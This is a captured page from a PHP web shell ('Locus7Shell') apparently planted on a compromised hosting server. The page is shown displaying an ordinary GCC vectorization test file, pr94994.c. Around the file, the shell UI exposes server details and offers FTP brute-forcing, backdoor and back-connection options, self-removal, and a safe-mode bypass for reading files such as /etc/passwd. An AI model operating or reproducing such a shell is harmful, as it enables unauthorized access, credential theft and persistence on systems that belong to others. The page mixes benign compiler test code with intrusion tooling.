Software: Apache. PHP/5.4.45 

uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue
Sep 17 08:14:20 UTC 2024 x86_64
 

uid=243112(mycochar) gid=100(users) groups=100(users)  

Safe-mode: OFF (not secure)

/home/mycochar/www/image/photo/gcc-12.3.0/gcc/testsuite/gcc.dg/vect/   drwxr-xr-x
Free 0 B of 0 B (0%)
Your ip: 216.73.216.77 - Server ip: 213.186.33.19
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    

[Enumerate]    [Encoder]    [Tools]    [Proc.]    [FTP Brute]    [Sec.]    [SQL]    [PHP-Code]    [Backdoor Host]    [Back-Connection]    [milw0rm it!]    [PHP-Proxy]    [Self remove]
    


Viewing file:     pr94994.c (1.12 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#include <stdint.h>
#include "tree-vect.h"

#define BLOCK_SIZE (sizeof (uint32_t))

struct unaligned {
  uint32_t x;
} __attribute__((packed, may_alias));

static inline uint32_t
load_unaligned (const char *p)
{
  return ((struct unaligned *) p)->x;
}

static inline void
store_unaligned (uint32_t x, char *p)
{
  ((struct unaligned *) p)->x = x;
}

void __attribute__((noipa))
copy (char *dst, const char *src, size_t n)
{
  for (size_t i = 0; i < n; i += BLOCK_SIZE)
    store_unaligned (load_unaligned (src + i), dst + i);
}

#define INPUT_SIZE 64
#define MAX_STEP 32

char x[INPUT_SIZE + MAX_STEP];

int
main (void)
{
  check_vect ();

  for (unsigned int i = 1; i < MAX_STEP; ++i)
    {
      for (unsigned int j = 0; j < INPUT_SIZE + MAX_STEP; ++j)
    x[j] = j + 10;
      copy (x + i, x, INPUT_SIZE);
      for (int j = 0; j < INPUT_SIZE + i; ++j)
    {
      int expected;
      if (j < i)
        expected = j + 10;
      else if (i >= BLOCK_SIZE)
        expected = j % i + 10;
      else if ((j - i) % BLOCK_SIZE < i)
        expected = x[j - i];
      else
        expected = j - i + 10;
      if (x[j] != expected)
        __builtin_abort ();
    }
    }

  return 0;
}

Enter:
 
Select:
 

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

Search
  - regexp 

Upload
 
[ ok ]

Make Dir
 
[ ok ]
Make File
 
[ ok ]

Go Dir
 
Go File
 

--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0062 ]--